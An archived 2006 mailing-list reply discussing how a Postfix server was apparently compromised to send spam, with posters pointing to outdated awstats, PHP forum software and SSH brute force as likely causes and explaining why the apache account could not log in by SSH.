[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: Postfix hit again (Spam)

On Tue, 23 May 2006, Les Mikesell wrote:

> On Tue, 2006-05-23 at 02:45, Paul Howarth wrote:
> > I don't think that's what this is. Form spam takes advantage of
> > poorly-coded mail/contact forms and uses them to send mail to recipients
> > other than those intended by the form designer.
> > 
> > What's happening here is that the spammer is running their own code
> > (downloaded into /tmp) to send the mail, a rather more serious
> > situation.

An old version of awstats will get you into this club, as will some of the
php based forum programs.

All it takes is for someone to install one of these in a document root and
not keep up with the updates. It is insanely trivial to exploit one of
these boxes. It even gets logged in the http logs for all to see.
The hardest part if figuring out when it actually happened so you can find
it in the logs.

> If you have ssh access open there's a fair chance that someone
> has done a brute-force password guess.  There is a lot of
> that going around.  Or you didn't apply all of the current
> updates before exposing the system to the internet.  

I suspect if ssh had been compromised that the user would have been something
other than apache. The passwd entry for apache generally looks something like
this: apache:x:48:48:Apache:/var/www:/sbin/nologin. Given this entry an ssh
login as apache would not be possible via brute force passwd attack vectors.


Tom Diehl		tdiehl rogueind com		Spamtrap address mtd123 rogueind com

[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]